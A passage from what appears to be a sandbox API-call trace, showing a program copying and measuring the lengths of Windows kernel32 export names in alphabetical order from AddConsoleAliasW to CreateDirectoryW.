(lpString="ADDCONSOLEALIASW") returned 16 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.053] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.053] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.053] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.053] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.053] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.053] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.053] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.053] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.053] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.053] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.053] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.053] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.053] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.053] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.053] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.053] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.054] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.054] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.054] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.054] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.054] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.054] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.054] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.054] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.054] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.054] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.054] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.054] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.054] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.054] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.054] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.054] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.054] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.054] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.054] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.054] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.055] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.055] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.055] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.055] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.055] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.055] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.055] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.055] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.055] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.055] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.055] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.055] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.055] lstrlenA (lpString="BEEP") returned 4 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.055] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.055] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.055] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.055] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.055] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.055] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.056] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.056] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.056] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.056] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.056] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.056] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.056] lstrlenA (lpString="CANCELIO") returned 8 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.056] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.056] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.056] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.056] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.056] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.056] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.056] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.056] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.056] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.056] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.056] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.056] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.057] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.057] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.057] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.057] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.057] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.057] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.057] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.057] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.057] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.057] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.057] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.057] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.057] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.057] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.057] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.058] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.058] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.058] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.058] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.058] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.058] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.058] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.058] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.058] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.058] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.058] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.058] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.058] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.058] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.058] lstrlenA (lpString="COPYFILEA") returned 9 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.058] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.058] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.058] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.058] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.059] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.059] lstrlenA (lpString="COPYFILEW") returned 9 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.059] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.059] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.059] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.059] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.059] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.059] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.059] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.059] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.059] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.059] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.059] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.059] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.059] 